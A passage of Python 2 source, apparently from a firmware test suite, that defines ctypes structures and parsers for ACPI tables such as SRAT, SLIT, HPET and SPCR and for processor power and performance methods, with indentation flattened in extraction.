class power_state_structure_id_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pss_id_value', ctypes.c_uint8, 6),
('pss_id_revision', ctypes.c_uint8, 2),
]
class power_state_structure_id(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', power_state_structure_id_bits),
]
class power_state_structure_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('memory_content_preserved', ctypes.c_uint8, 1),
('autonomous_power_state_entry', ctypes.c_uint8, 1),
('autonomous_power_state_exit', ctypes.c_uint8, 1),
]
class power_state_structure_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', power_state_structure_flags_bits),
]
class MPSTCharacteristics(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pss_id', power_state_structure_id),
('flags', power_state_structure_flags),
('reserved', ctypes.c_uint16),
('average_power', ctypes.c_uint32),
('relative_power', ctypes.c_uint32),
('exit_latency', ctypes.c_uint64),
('reserved2', ctypes.c_uint32),
]
def mpst_factory(field_list, characteristics_count):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class MPST_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('pcc_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
('memory_power_node_count', ctypes.c_uint16),
('reserved2', ctypes.c_uint16),
('memory_power_nodes', subtables),
('characteristics_count', ctypes.c_uint16),
('reserved3', ctypes.c_uint16),
('characteristics', MPSTCharacteristics * characteristics_count),
]
return MPST_v1
def mpst_subtable_list(addr, memory_power_node_count):
field_list = list()
base_MPSTMemPowerNode = MPSTMemPowerNode_factory(0, 0)
for subtable_num in range(1, memory_power_node_count + 1):
subtable = base_MPSTMemPowerNode.from_address(addr)
cls = MPSTMemPowerNode_factory(subtable.num_power_states, subtable.num_physical_components)
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def MPST(val):
"""Create class based on decode of an PMTT table from address or filename."""
base_length = ctypes.sizeof(mpst_factory(list(), 0))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
mpst = mpst_factory(list(), 0).from_address(addr)
field_list = mpst_subtable_list(ctypes.addressof(mpst.memory_power_nodes), mpst.memory_power_node_count)
mpst = mpst_factory(field_list, 0).from_address(addr)
if isinstance(val, str):
return mpst_factory(field_list, mpst.characteristics_count).from_buffer_copy(data)
return mpst_factory(field_list, mpst.characteristics_count).from_address(addr)
parse_mpst = make_compat_parser("MPST")
class MSCTProximityDomainInfo_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('revision', ctypes.c_uint8),
('length', ctypes.c_uint8),
('proximity_domain_range_low', ctypes.c_uint32),
('proximity_domain_range_high', ctypes.c_uint32),
('max_processor_capacity', ctypes.c_uint32),
('max_memory_capacity', ctypes.c_uint64),
]
def msct_factory(num_proxdominfo):
class MSCT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('proximity_domain_info_offset', ctypes.c_uint32),
('max_proximity_domains', ctypes.c_uint32),
('max_clock_domains', ctypes.c_uint32),
('max_physical_address', ctypes.c_uint64),
('proximity_domain_info_structs', num_proxdominfo * MSCTProximityDomainInfo_v1),
]
return MSCT_v1
def MSCT(val):
"""Create class based on decode of an MSCT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(TableHeader)) / ctypes.sizeof(MSCTProximityDomainInfo_v1)
if isinstance(val, str):
return msct_factory(num_tables).from_buffer_copy(data)
return msct_factory(num_tables).from_address(addr)
parse_msct = make_compat_parser("MSCT")
def msdm_factory(data_len):
"""Create variable-sized MSDM table."""
class MSDM_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('software_licensing_structure', ctypes.c_uint8 * data_len),
]
return MSDM_v1
def MSDM(val):
"""Create class based on decode of an MSDM table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
data_len = hdr.length - ctypes.sizeof(msdm_factory(0))
if isinstance(val, str):
return msdm_factory(data_len).from_buffer_copy(data)
return msdm_factory(data_len).from_address(addr)
parse_msdm = make_compat_parser("MSDM")
def slic_factory(data_len):
"""Create variable-sized SLIC table."""
class SLIC_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('software_licensing_structure', ctypes.c_uint8 * data_len)
]
return SLIC_v1
def SLIC(val):
"""Create class based on decode of an SLIC table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
data_len = hdr.length - ctypes.sizeof(slic_factory(0))
if isinstance(val, str):
return slic_factory(data_len).from_buffer_copy(data)
return slic_factory(data_len).from_address(addr)
parse_slic = make_compat_parser("SLIC")
def slit_factory(num_system_localities):
class SLIT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('number_system_localities', ctypes.c_uint64),
('relative_distances', ctypes.c_uint8 * num_system_localities * num_system_localities),
]
return SLIT_v1
def SLIT(val):
"""Create class based on decode of an DMAR table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
s = slit_factory(0).from_address(addr)
if isinstance(val, str):
return slit_factory(s.number_system_localities).from_buffer_copy(data)
return slit_factory(s.number_system_localities).from_address(addr)
parse_slit = make_compat_parser("SLIT")
class SRATSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('length', ctypes.c_uint8),
]
class SRATLocalApicAffinity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
]
class SRATLocalApicAffinity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', SRATLocalApicAffinity_flags_bits),
]
class SRATLocalApicAffinity(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('proximity_domain_7_0', ctypes.c_uint8),
('apic_id', ctypes.c_uint8),
('flags', SRATLocalApicAffinity_flags),
('local_sapic_eid', ctypes.c_uint8),
('proximity_domain_31_8', ctypes.c_uint8 * 3),
('clock_domain', ctypes.c_uint32),
]
class SRATMemoryAffinity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
('hot_pluggable', ctypes.c_uint32, 1),
('nonvolatile', ctypes.c_uint32, 1),
]
class SRATMemoryAffinity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', SRATMemoryAffinity_flags_bits),
]
class SRATMemoryAffinity(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('proximity_domain', ctypes.c_uint32),
('reserved1', ctypes.c_uint8 * 2),
('base_address_low', ctypes.c_uint32),
('base_address_high', ctypes.c_uint32),
('length_low', ctypes.c_uint32),
('length_high', ctypes.c_uint32),
('reserved2', ctypes.c_uint32),
('flags', SRATMemoryAffinity_flags),
('reserved3', ctypes.c_uint64),
]
class SRATLocalX2ApicAffinity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
]
class SRATLocalX2ApicAffinity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', SRATLocalX2ApicAffinity_flags_bits),
]
class SRATLocalX2ApicAffinity(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('reserved1', ctypes.c_uint16),
('proximity_domain', ctypes.c_uint32),
('x2apic_id', ctypes.c_uint32),
('flags', SRATLocalX2ApicAffinity_flags),
('clock_domain', ctypes.c_uint32),
('reserved2', ctypes.c_uint32),
]
def SRATSubtableUnknown_factory(_len):
class SRATSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('data', ctypes.c_uint8 * _len),
]
return SRATSubtableUnknown
SRAT_LOCAL_APIC_AFFINITY = 0
SRAT_MEMORY_AFFINITY = 1
SRAT_LOCAL_X2APIC_AFFINITY = 2
def srat_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class SRAT_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('reserved1', ctypes.c_uint32),
('reserved2', ctypes.c_uint64),
('subtables', subtables),
]
def __str__(self):
out = StringIO()
print >>out, "SRAT Summary\n"
mem = [t for t in self.subtables if (t.subtype == SRAT_MEMORY_AFFINITY) and t.flags.bits.enabled]
if mem:
print >>out, "Enabled Memory Affinity Domains"
for m in mem:
domain = m.proximity_domain
addr = (m.base_address_high << 32) + m.base_address_low
len = (m.length_high << 32) + m.length_low
print >>out, "domain = {:#x} base address = {:#016x} length = {:#016x}".format(domain, addr, len)
print >>out
xapic = [t for t in self.subtables if (t.subtype == SRAT_LOCAL_APIC_AFFINITY) and t.flags.bits.enabled]
x2apic = [t for t in self.subtables if (t.subtype == SRAT_LOCAL_X2APIC_AFFINITY) and t.flags.bits.enabled]
if xapic or x2apic:
domain_apicids = {}
print >>out, "Enabled Processor Affinity Domains"
for x in xapic:
domain = (x.proximity_domain_31_8[2] << 24) + (x.proximity_domain_31_8[1] << 16) + (x.proximity_domain_31_8[0] << 8) + x.proximity_domain_7_0
domain_apicids.setdefault(domain, []).append(x.apic_id)
for x2 in x2apic:
domain_apicids.setdefault(x2.proximity_domain, []).append(x2.x2apic_id)
for domain, apicids in domain_apicids.iteritems():
print >>out, "domain={:#x} apicids={}".format(domain, ','.join("{:#x}".format(a) for a in sorted(apicids)))
print >>out
print >>out, super(SRAT_v3, self).__str__()
return out.getvalue()
return SRAT_v3
def SRAT(val):
"""Create class based on decode of an SRAT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
end = addr + hdr.length
current = addr + ctypes.sizeof(srat_factory(list()))
field_list = list()
subtable_num = 0
while current < end:
subtable_num += 1
subtable = SRATSubtable.from_address(current)
current += subtable.length
if subtable.subtype == SRAT_LOCAL_APIC_AFFINITY:
cls = SRATLocalApicAffinity
elif subtable.subtype == SRAT_MEMORY_AFFINITY:
cls = SRATMemoryAffinity
elif subtable.subtype == SRAT_LOCAL_X2APIC_AFFINITY:
cls = SRATLocalX2ApicAffinity
else:
cls = srat_subtable_unknown_factory(subtable.length - ctypes.sizeof(SRATSubtable))
field_list.append( ('subtable{}'.format(subtable_num), cls) )
if isinstance(val, str):
return srat_factory(field_list).from_buffer_copy(data)
return srat_factory(field_list).from_address(addr)
def parse_srat(printflag=False, EnabledOnly=False, instance=1):
"""Parse and optionally print an SRAT table."""
srat = parse_table("SRAT", instance)
if srat is None:
return None
if printflag:
with ttypager.page():
print srat
if EnabledOnly:
with ttypager.page():
print '\n'.join(str(subtable) for subtable in srat.subtables if subtable.flags.bits.enabled)
return srat
def _asid_str(asid):
if asid >= 0xC0 and asid <= 0xff:
return 'OEM Defined'
_asid = {
ASID_SYSTEM_MEMORY: 'System Memory',
ASID_SYSTEM_IO: 'System IO',
ASID_PCI_CFG_SPACE: 'PCI Configuration Space',
ASID_EMBEDDED_CONTROLLER: 'Embedded Controller',
ASID_SMBUS: 'SMBus',
ASID_PCC: 'Platform Communications Channel (PCC)',
ASID_FFH: 'Functional Fixed Hardware',
}
return _asid.get(asid, 'Reserved')
class flow_control_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('DCD', ctypes.c_uint8, 1),
('RTSCTS', ctypes.c_uint8, 1),
('XONXOFF', ctypes.c_uint8, 1),
]
class flow_control(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', flow_control_bits),
]
# Decode for baud rate the BIOS used for redirection
baud = {
3: 9600,
4: 19200,
6: 57600,
7: 115200,
}
def _format_baud(val):
return baud.get(val, 'Reserved')
class SPCR_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('interface_type', ctypes.c_uint8),
('reserved0', ctypes.c_uint8 * 3),
('base_address', GAS),
('int_type', ctypes.c_uint8),
('irq', ctypes.c_uint8),
('global_sys_int', ctypes.c_uint32),
('baud_rate', ctypes.c_uint8),
('parity', ctypes.c_uint8),
('stop_bits', ctypes.c_uint8),
('flow_control', flow_control),
('terminal_type', ctypes.c_uint8),
('reserved1', ctypes.c_uint8),
('pci_did', ctypes.c_uint16),
('pci_vid', ctypes.c_uint16),
('pci_bus', ctypes.c_uint8),
('pci_dev', ctypes.c_uint8),
('pci_func', ctypes.c_uint8),
('pci_flags', ctypes.c_uint32),
('pci_segment', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 4)
]
_formats = {
'baud_rate': unpack.format_function("{}", _format_baud),
'parity': unpack.format_table("{}", { 0: 'No Parity' }),
'stop_bits': unpack.format_table("{}", { 1: '1 stop bit' }),
}
def SPCR(val):
"""Create class based on decode of an SPCR table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return SPCR_v1.from_buffer_copy(data)
return SPCR_v1.from_address(addr)
parse_spcr = make_compat_parser("SPCR")
class event_timer_block_id_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('hardware_rev_id', ctypes.c_uint32, 8),
('num_comparators', ctypes.c_uint32, 5),
('count_size_cap_counter_size', ctypes.c_uint32, 1),
('reserved', ctypes.c_uint32, 1),
('legacy_replacement_IRQ_routing_capable', ctypes.c_uint32, 1),
('pci_vid', ctypes.c_uint32, 16),
]
class event_timer_block_id(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', event_timer_block_id_bits),
]
_page_protection_table = {
0: 'No Guarantee for page protection',
1: '4KB page protected',
2: '64KB page protected',
}
class hpet_capabilities_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('page_protection', ctypes.c_uint8, 4),
('oem_attributes', ctypes.c_uint8, 4),
]
_formats = {
'page_protection': unpack.format_table("{:#x}", _page_protection_table),
}
class hpet_capabilities(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', hpet_capabilities_bits),
]
class HPET_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('event_timer_block_id', event_timer_block_id),
('base_address', GAS),
('hpet_number', ctypes.c_uint8),
('main_counter_min_clock_tick_in_periodic_mode', ctypes.c_uint16),
('capabilities', hpet_capabilities),
]
def HPET(val):
"""Create class based on decode of an HPET table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return HPET_v1.from_buffer_copy(data)
return HPET_v1.from_address(addr)
parse_hpet = make_compat_parser("HPET")
def uefi_factory(data_len):
class UEFI_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('identifier', bits.cdata.GUID),
('data_offset', ctypes.c_uint16),
('data', ctypes.c_uint8 * data_len),
]
_formats = {
'identifier': bits.cdata._format_guid,
}
return UEFI_v1
def UEFI(val):
"""Create class based on decode of an UEFI table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
u = TableHeader.from_address(addr)
data_len = u.length - ctypes.sizeof(uefi_factory(0))
if isinstance(val, str):
return uefi_factory(data_len).from_buffer_copy(data)
return uefi_factory(data_len).from_address(addr)
parse_uefi = make_compat_parser("UEFI")
_wdt_available_decode = {
0: 'permanently disabled',
1: 'available',
}
_wdt_active_decode = {
0: 'WDT stopped when BIOS hands off control',
1: 'WDT running when BIOS hnads off control',
}
_ownership_decode = {
0: 'TCO is owned by the BIOS',
1: 'TCO is owned by the OS',
}
class wddt_status_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('wdt_available', ctypes.c_uint16, 1),
('wdt_active', ctypes.c_uint16, 1),
('ownership', ctypes.c_uint16, 1),
('reserved', ctypes.c_uint16, 8),
('user_reset_event', ctypes.c_uint16, 1),
('wdt_event', ctypes.c_uint16, 1),
('power_fail_event', ctypes.c_uint16, 1),
('unknown_reset_event', ctypes.c_uint16, 1),
]
_formats = {
'wdt_available': unpack.format_table("{}", _wdt_available_decode),
'wdt_active': unpack.format_table("{}", _wdt_active_decode),
'ownership': unpack.format_table("{}", _ownership_decode),
}
class wddt_status(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', wddt_status_bits),
]
class wddt_capability_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('auto_reset', ctypes.c_uint16, 1),
('alert_support', ctypes.c_uint16, 1),
('platform_directed_shutdown', ctypes.c_uint16, 1),
('immediate_shutdown', ctypes.c_uint16, 1),
('bios_handoff_support', ctypes.c_uint16, 1),
]
class wddt_capability(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', wddt_capability_bits),
]
class WDDT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('tco_spec_version', ctypes.c_uint16),
('tco_description_table_version', ctypes.c_uint16),
('pci_vid', ctypes.c_uint16),
('tco_base_address', GAS),
('timer_min_count', ctypes.c_uint16),
('timer_max_count', ctypes.c_uint16),
('timer_count_period', ctypes.c_uint16),
('status', wddt_status),
('capability', wddt_capability),
]
def WDDT(val):
"""Create class based on decode of an WDDT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return WDDT_v1.from_buffer_copy(data)
return WDDT_v1.from_address(addr)
parse_wddt = make_compat_parser("WDDT")
def get_cpupaths(*args):
cpupaths, devpaths = _acpi._cpupaths(*args)
apic = parse_apic()
procid_apicid = apic.procid_apicid
uid_x2apicid = apic.uid_x2apicid
if procid_apicid is None or uid_x2apicid is None:
# No APIC table exists, so assume the existing cpus are enabled
return cpupaths
enabled_cpupaths = []
for cpupath in cpupaths:
procdef = evaluate(cpupath)
if procdef is not None and procdef.ProcId in procid_apicid:
enabled_cpupaths.append(cpupath)
for devpath in devpaths:
uid = evaluate(devpath + "._UID")
if uid is not None and uid in uid_x2apicid:
enabled_cpupaths.append(devpath)
return enabled_cpupaths
def find_procid():
cpupaths = get_cpupaths()
cpupath_procid = {}
for cpupath in cpupaths:
if get_object_info(cpupath).object_type != ACPI_TYPE_PROCESSOR:
continue
processor = evaluate(cpupath)
if processor is not None:
cpupath_procid[cpupath] = processor.ProcId
else:
cpupath_procid[cpupath] = None
return OrderedDict(sorted(cpupath_procid.items()))
def find_uid():
cpupaths = get_cpupaths()
cpupath_uid = {}
for cpupath in cpupaths:
if get_object_info(cpupath).object_type != ACPI_TYPE_DEVICE:
continue
value = evaluate(cpupath + "._UID")
cpupath_uid[cpupath] = value
return OrderedDict(sorted(cpupath_uid.items()))
def commonprefix(l):
"""Return the common prefix of a list of strings."""
if not l:
return ''
prefix = l[0]
for s in l[1:]:
for i, c in enumerate(prefix):
if c != s[i]:
prefix = s[:i]
break
return prefix
def factor_commonprefix(l):
if not l:
return ''
if len(l) == 1:
return l[0]
prefix = commonprefix(l)
prefixlen = len(prefix)
return prefix + "{" + ", ".join([s[prefixlen:] for s in l]) + "}"
def display_cpu_info():
cpupaths = get_cpupaths()
cpupath_procid = find_procid()
cpupath_uid = find_uid()
apic = parse_apic()
procid_apicid = apic.procid_apicid
uid_x2apicid = apic.uid_x2apicid
if procid_apicid is None or uid_x2apicid is None:
return
socketindex_cpuscope = {}
s = factor_commonprefix(cpupaths) + '\n'
for cpupath in cpupaths:
s += '\n' + cpupath
def socket_str(apicid):
socket_index = bits.socket_index(apicid)
if socket_index is None:
return ''
return ', socketIndex=0x%02x' % socket_index
def apicid_str(apicid):
if apicid is None:
return 'no ApicID'
return 'ApicID=0x%02x%s' % (apicid, socket_str(apicid))
procid = cpupath_procid.get(cpupath, None)
if procid is not None:
s += ' ProcID=%-2u (%s) ' % (procid, apicid_str(procid_apicid.get(procid, None)))
socketindex_cpuscope.setdefault(bits.socket_index(procid_apicid.get(procid, None)), []).append(scope(cpupath))
uid = cpupath_uid.get(cpupath, None)
if uid is not None:
s += ' _UID=%s (%s)' % (uid, apicid_str(uid_x2apicid.get(uid, None)))
socketindex_cpuscope.setdefault(bits.socket_index(uid_x2apicid.get(uid, None)), []).append(scope(cpupath))
for value, scopes in socketindex_cpuscope.iteritems():
unique_scopes = set(scopes)
s += '\nsocket {0} contains {1} processors and {2} ACPI scope: {3}\n'.format(value, len(scopes), len(unique_scopes), ','.join(sorted(unique_scopes)))
ttypager.ttypager_wrap(s, indent=False)
def display_acpi_method(method, print_one):
"""Helper function that performs all basic processing for evaluating an ACPI method"""
cpupaths = get_cpupaths()
uniques = {}
for cpupath in cpupaths:
value = evaluate(cpupath + "." + method)
uniques.setdefault(value, []).append(cpupath)
print ttypager._wrap("%u unique %s values" % (len(uniques), method))
for value, cpupaths in sorted(uniques.iteritems(), key=(lambda (k,v): v)):
print
print ttypager._wrap(factor_commonprefix(cpupaths))
if value is None:
print "No %s found for these CPUs" % method
else:
print_one(value)
def parse_cpu_method(method):
cls = globals()["parse" + string.lower(method)]
cpupaths = get_cpupaths()
uniques = {}
for cpupath in cpupaths:
value = evaluate(cpupath + "." + method)
if value is not None:
obj = cls(value)
else:
obj = None
uniques.setdefault(obj, []).append(cpupath)
return uniques
def display_cpu_method(method):
uniques = parse_cpu_method(method)
lines = [ttypager._wrap("{} unique {} values".format(len(uniques), method))]
for value, cpupaths in sorted(uniques.iteritems(), key=(lambda (k,v): v)):
lines.append("")
lines.append(ttypager._wrap(factor_commonprefix(cpupaths)))
if value == None:
lines.append("No {} found for these CPUs".format(method))
elif ctypes.sizeof(value) == 0:
lines.append("No {} found for these CPUs".format(method))
else:
lines.extend(ttypager._wrap(str(value), indent=False).splitlines())
ttypager.ttypager("\n".join(lines))
def _CSD_factory(num_dependencies):
class CStateDependency(bits.cdata.Struct):
"""C-State Dependency"""
_pack_ = 1
_fields_ = [
('num_entries', ctypes.c_uint32),
('revision', ctypes.c_uint8),
('domain', ctypes.c_uint32),
('coordination_type', ctypes.c_uint32),
('num_processors', ctypes.c_uint32),
('index', ctypes.c_uint32),
]
_formats = {
'coordination_type': unpack.format_table("{:#x}", _coordination_types)
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _CSD(bits.cdata.Struct):
_pack = 1
_fields_ = [
('CStateDependencies', CStateDependency * num_dependencies),
]
return _CSD
def parse_csd(dependencies):
"""Parse C-State Dependency"""
return _CSD_factory(len(csd_data))(csd_data)
class CState(bits.cdata.Struct):
"""Processor Power States (CStates)"""
_pack_ = 1
_fields_ = [
('register', SingleRegister),
('type', ctypes.c_uint8),
('latency', ctypes.c_uint16),
('power', ctypes.c_uint32),
]
_formats = {
'type': lambda x: "C{}".format(x),
'latency': lambda x: "{} us".format(x),
'power': lambda x: "{} mW".format(x),
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
def make_CStates(data):
if data is None:
return None
if isinstance(data, tuple):
if len(data) == 4:
if isinstance(data[0], SingleRegister):
return CState(*data)
return tuple(make_CStates(v) for v in data)
return data
def _CST_factory(num_cstates):
class _CST(bits.cdata.Struct):
_pack = 1
_fields_ = [
('count', ctypes.c_uint32),
('CStates', CState * num_cstates),
]
return _CST
def parse_cst(cst_data):
"""Parse Processor Power States (_CST)"""
cst_data = make_resources(cst_data)
return _CST_factory(cst_data[0])(cst_data[0], cst_data[1:])
#if hasattr(cstate, 'FFH'):
# # Decode register as FFH
# if cstate.FFH.VendorCode == 0:
# desc += "C1 Halt"
# elif (cstate.FFH.VendorCode == 1) and (cstate.FFH.ClassCode == 1):
# desc += "C1 I/O then Halt I/O port address = {#x}".format(Register.Arg0)
# elif (cstate.FFH.VendorCode == 1) and (cstate.FFH.ClassCode == 2):
# desc += "MWAIT {:#02x} ({})".format(cstate.FFH.Arg0, cpulib.mwait_hint_to_cstate(cstate.FFH.Arg0))
# desc += " {} {}BMAvoid".format(("SWCoord", "HWCoord")[bool(cstate.FFH.Arg1 & 1)], ("!", "")[bool(cstate.FFH.Arg1 & (1 << 1))])
# lines.append("C{cstate_num:<d} {desc}".format(cstate_num=cstate_num, desc=desc))
#else:
# # Decode register as actual hardware resource
# lines.append(" {:11s} {:10s} {:9s} {:10s} {:8s}".format("AddrSpaceId", "BitWidth", "BitOffset", "AccessSize", "Address"))
# lines.append("C{cstate_num:<d} {r.AddressSpaceId:<#11x} {r.BitWidth:<#10x} {r.BitOffset:<#9x} {r.AccessSize:<#10x} {r.Address:<#8x}".format(cstate_num=cstate_num, r=cstate.register))
# Decode and print ACPI c-state, latency, & power
#lines.append(" ACPI C{c.type:<1d} latency={c.latency}us power={c.power}mW".format(c=cstate))
class _PCT(bits.cdata.Struct):
"""Performance Control"""
_pack = 1
_fields_ = [
('control_register', SingleRegister),
('status_register', SingleRegister),
]
def parse_pct(pct_data):
"""Parse Performance Control"""
return _PCT(*make_resources(pct_data))
class _PDL(bits.cdata.Struct):
"""P-State Depth Limit"""
_pack_ = 1
_fields_ = [
('pstate_depth_limit', ctypes.c_uint32),
]
_formats = {
'pstate_depth_limit': (lambda x : "Lowest performance state that OSPM can use = {}".format(x)),
}
def parse_pdl(pdl_data):
"""Parse P-State Depth Limit"""
return _PDL(pdl_data)
class _PPC(bits.cdata.Struct):
"""Performance Present Capabilities"""
_pack_ = 1
_fields_ = [
('highest_pstate', ctypes.c_uint32),
]
_formats = {
'highest_pstate': (lambda x : "Highest performance state that OSPM can use = {}".format(x)),
}
def parse_ppc(ppc_data):
"""Parse Performance Present Capabilities"""
return _PPC(ppc_data)
_coordination_types = {
0xFC : 'SW_ALL',
0xFD : 'SW_ANY',
0xFE : 'HW_ALL',
}
def _PSD_factory(num_dependencies):
class PStateDependency(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('num_entries', ctypes.c_uint32),
('revision', ctypes.c_uint8),
('domain', ctypes.c_uint32),
('coordination_type', ctypes.c_uint32),
('num_processors', ctypes.c_uint32),
]
_formats = {
'coordination_type': unpack.format_table("{:#x}", _coordination_types)
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _PSD(bits.cdata.Struct):
_pack = 1
_fields_ = [
('PStateDependencies', PStateDependency * num_dependencies),
]
return _PSD
def parse_psd(psd_data):
"""Parse P-State Dependency"""
return _PSD_factory(len(psd_data))(psd_data)
def _PSS_factory(num_pstates):
class PState(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('core_frequency', ctypes.c_uint32),
('power', ctypes.c_uint32),
('latency', ctypes.c_uint32),
('bus_master_latency', ctypes.c_uint32),
('control', ctypes.c_uint32),
('status', ctypes.c_uint32),
]
_formats = {
'core_frequency': lambda x: "{} MHz".format(x),
'power': lambda x: "{} mW".format(x),
'latency': lambda x: "{} us".format(x),
'bus_master_latency': lambda x: "{} us".format(x),
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _PSS(bits.cdata.Struct):
_pack = 1
_fields_ = [
('pstates', PState * num_pstates),
]
return _PSS
def parse_pss(pstates):
"""Parse Performance Supported States"""
return _PSS_factory(len(pstates))(pstates)
class _PTC(bits.cdata.Struct):
"""Processor Throttling Control"""
_pack = 1
_fields_ = [
('control_register', SingleRegister),
('status_register', SingleRegister),
]
def parse_ptc(ptc_data):
"""Parse Processor Throttling Control"""
return _PTC(*make_resources(ptc_data))
class _TDL(bits.cdata.Struct):
"""T-State Depth Limit"""
_pack_ = 1
_fields_ = [
('lowest_tstate', ctypes.c_uint32),
]
_formats = {
'lowest_tstate': (lambda x : "Lowest throttling state that OSPM can use = {}".format(x)),
}
def parse_tdl(tdl_data):
"""Parse T-State Depth Limit"""
return _TDL(tdl_data)
class _TPC(bits.cdata.Struct):
"""Throttling Present Capabilities"""
_pack_ = 1
_fields_ = [
('highest_tstate', ctypes.c_uint32),
]
_formats = {
'highest_tstate': (lambda x : "Highest throttling state that OSPM can use = {}".format(x)),
}
def parse_tpc(tpc_data):
"""Parse Throttling Present Capabilities"""
return _TPC(tpc_data)
def _TSD_factory(num_dependencies):
class TStateDependency(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('num_entries', ctypes.c_uint32),
('revision', ctypes.c_uint8),
('domain', ctypes.c_uint32),
('coordination_type', ctypes.c_uint32),
('num_processors', ctypes.c_uint32),
]
_formats = {
'coordination_type': unpack.format_table("{:#x}", _coordination_types)
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _TSD(bits.cdata.Struct):
_pack = 1
_fields_ = [
('TStateDependencies', TStateDependency * num_dependencies),
]
return _TSD
